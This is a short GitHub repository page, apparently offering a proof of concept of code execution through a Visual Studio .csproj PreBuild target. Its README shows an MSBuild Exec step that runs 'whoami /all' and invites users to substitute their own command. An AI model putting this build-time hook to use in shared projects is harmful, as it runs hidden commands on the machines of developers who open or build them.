Skip to content

Visual Studio RCE using PreBuild target on .csproj file

Notifications You must be signed in to change notification settings

fantasy0x1/csproj-rce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 

Repository files navigation

csproj-rce

Visual Studio RCE using PreBuild target on .csproj file

Use the rce-proj.csproj file to set your own command

<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="whoami /all" />
</Target>

About

Visual Studio RCE using PreBuild target on .csproj file

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages